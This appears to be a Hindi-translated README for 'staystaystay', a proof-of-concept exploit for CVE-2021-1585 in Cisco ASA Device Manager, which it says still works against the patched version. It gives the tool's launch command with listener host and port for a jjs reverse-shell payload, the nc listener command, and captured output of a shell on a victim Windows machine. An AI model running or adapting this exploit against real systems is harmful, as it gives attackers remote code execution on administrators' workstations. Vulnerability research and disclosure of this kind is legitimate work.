
CVE-2021-1585 के लिए प्रमाण अवधारणा: Cisco ASA Device Manager RCE
staystaystay CVE-2021-1585 के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट है, जो Cisco ASA डिवाइस मैनेजर (ASDM) को प्रभावित करने वाला एक मैन इन द मिडिल या ईविल एंडपॉइंट RCE मुद्दा है। यह मुद्दा मूल रूप से Malcolm Lashley द्वारा खोजा गया था और 2021 की गर्मियों में प्रकट किया गया था। हालाँकि, जिस समय मैं इस पर देख रहा था, यह नवीनतम संस्करण (ASDM 7.17(1)) में अनपैच था, मैं स्वतंत्र रूप से इस पर ठोकर खाई।
Cisco ने ASDM 7.18(1.152) में इसे "ठीक" किया। मैं "ठीक" कहता हूँ क्योंकि यह एक्सप्लॉइट अभी भी ठीक काम करता है। उपयोगकर्ता को केवल "हाँ" पर क्लिक करना होगा। नीचे एक वीडियो देखें।
हमलावर पीड़ित के लिए रिवर्स शेल प्राप्त करने के लिए दो प्रकार के पेलोड कॉन्फ़िगर कर सकते हैं:
यदि कोई पीड़ित अपने ASDM को staystaystay से कनेक्ट करता है तो यह कॉन्फ़िगर किए गए पेलोड को इंजेक्ट करेगा जिसके परिणामस्वरूप एक रिवर्स शेल होगा। jjs रिवर्स शेल को एक सामान्य nc लिसनर (या यदि आप चाहें तो Metasploit) से पकड़ा जा सकता है। Longtime Sunshine विकल्प के लिए आवश्यक है कि हमलावर उस फ्रेमवर्क का उपयोग करे।
उदाहरण के तौर पर, निम्न कमांड jjs पेलोड के साथ पोर्ट 8443 पर staystaystay शुरू करेगा:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
एक बार पीड़ित 8443 से कनेक्ट होता है, तो 10.0.0.2:1270 पर एक रिवर्स शेल उत्पन्न होगा:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
निम्नलिखित वीडियो में Longtime Sunshine के साथ शोषण का एक उदाहरण है:
निम्नलिखित वीडियो एक पैच किए गए संस्करण के खिलाफ हमले को प्रदर्शित करता है:
एक AttackerKB लेख यहाँ पाया जा सकता है: